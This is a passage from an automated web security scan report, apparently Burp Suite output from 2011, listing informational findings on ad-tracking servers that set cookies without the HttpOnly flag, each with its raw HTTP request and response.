Content-Type: text/html
Content-Length: 331

document.write('<SCRIPT TYPE="text/javascript" SRC="http://panther1.cpxinteractive.com/mz/ds.js"></SCRIPT>');


document.write('<script language="JavaScript" src="http://ads1.revenue.net/load/2
...[SNIP]...

14.64. http://ads1.revenue.net/load/227245/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads1.revenue.net
Path:   /load/227245/index.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /load/227245/index.html?O_R_NUM=58437537&O_RANK=1&O_CREATIVE_ID=227245&O_PPLACEMENT_ID=1&O_SITE_ID=12169& HTTP/1.1
Host: ads1.revenue.net
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Train0=.CABx2OjE6MToxMjE2OToyMjcyNDU6MzQ0MDo1ODQzNzUzNzoxOjA6MTMwNTI0NDU1RAWwAQQwMTM1MTotKQQABzEzMDUyMDEzNTERAAA=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:56:02 GMT
Server: Oversee Webserver v1.3.20
Vary: Accept-Encoding
Cache-control: private, no-cache, must-revalidate
Pragma: no-cache
P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Connection: close
O_CREATIVE_ID: 227245
Set-Cookie: Train0=.CAB9sOjE6MToxMjE2OToyMjcyNDU6MzQ0MDo1ODQzNzUzNzoxOjA6MTMwNTI0NDU2MjoxsAEEMDEzNjI6LSkEAIwEmgJ8dnQEIAdNATVUDydOATUxKUQBCS06MTMwNTIwMTM2MhEAAA==; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT
Content-Type: text/html
Content-Length: 0


14.65. http://akatracking.esearchvision.com/esi/redirect.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://akatracking.esearchvision.com
Path:   /esi/redirect.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /esi/redirect.html?esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=40007&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://akatracking.esearchvision.com/esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=40007&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1
Set-Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee;expires=Fri, 11 May 2012 11:01:11 GMT;path=/;domain=esearchvision.com
ETag: "c442c4a32adbd04908e9fed8cf5e4aff:1203522432"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=77115
Date: Thu, 12 May 2011 11:01:11 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

14.66. http://akatracking.esearchvision.com/esi/redirect2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://akatracking.esearchvision.com
Path:   /esi/redirect2.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=40007&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://ad.doubleclick.net/clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: ESVA40007=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE187139093_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11:01:11 GMT;path=/;domain=esearchvision.com
Set-Cookie: REFESEVA40007=;expires=Fri, 11 May 2012 11:01:11 GMT;path=/;domain=esearchvision.com
ETag: "c7728f1f5feca396220a5389a6a06c7d:1304367611"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=34120
Date: Thu, 12 May 2011 11:01:11 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

14.67. http://altfarm.mediaplex.com/ad/js/15917-119013-26745-9

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/15917-119013-26745-9

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/15917-119013-26745-9?mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Sun, 12-May-2013 4:51:06 GMT; path=/; domain=.mediaplex.com;
Location: http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D7164347&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f
Content-Length: 0
Date: Thu, 12 May 2011 11:39:07 GMT


14.68. http://amch.questionmarket.com/adsc/d908257/6/911744/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d908257/6/911744/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d908257/6/911744/decide.php?ord=1305200304 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_912024-2-1_200214693344-2-1_912025-2-4; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-*66)M-<E

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:45 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Set-Cookie: CS1=deleted; expires=Wed, 12 May 2010 11:39:44 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_912024-2-1_200214693344-2-1_912025-2-4_911744-6-1; expires=Mon, 02 Jul 2012 03:39:45 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-*66)M-<E_908257-ON6)M-0; expires=Mon, 02-Jul-2012 03:39:45 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.69. http://amch.questionmarket.com/adsc/d909615/2/200214693344/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d909615/2/200214693344/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d909615/2/200214693344/decide.php?ord=1305198953 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_912024-2-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-*66)M-0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:15:55 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a208.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:15:54 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_912024-2-1_200214693344-2-1; expires=Mon, 02-Jul-2012 03:15:55 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-*66)M-4; expires=Mon, 02-Jul-2012 03:15:55 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.70. http://amch.questionmarket.com/adsc/d909615/2/200214693345/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d909615/2/200214693345/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d909615/2/200214693345/decide.php?ord=1305199695 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/06/palantir-valued-at-2-5-billion-or-more/
Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-c; LP=1305126639; CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-2_912026-2-1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:28:17 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a231.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:28:16 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-2_912026-2-1_200214693345-2-1; expires=Mon, 02-Jul-2012 03:28:17 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-i; expires=Mon, 02-Jul-2012 03:28:17 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.71. http://amch.questionmarket.com/adsc/d909615/2/200214693346/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d909615/2/200214693346/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d909615/2/200214693346/decide.php?ord=1305198949 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:15:51 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC"
DL_S: a206
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:15:50 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_200214693346-2-1; expires=Mon, 02-Jul-2012 03:15:51 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-*66)M-0; expires=Mon, 02-Jul-2012 03:15:51 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.72. http://amch.questionmarket.com/adsc/d909615/2/912024/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d909615/2/912024/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d909615/2/912024/decide.php?ord=1305198950 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:15:52 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC"
DL_S: a206
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:15:51 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_912024-2-1; expires=Mon, 02-Jul-2012 03:15:52 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-.66)M-0; expires=Mon, 02-Jul-2012 03:15:52 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.73. http://amch.questionmarket.com/adsc/d909615/2/912025/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d909615/2/912025/decide.php

Issue detail

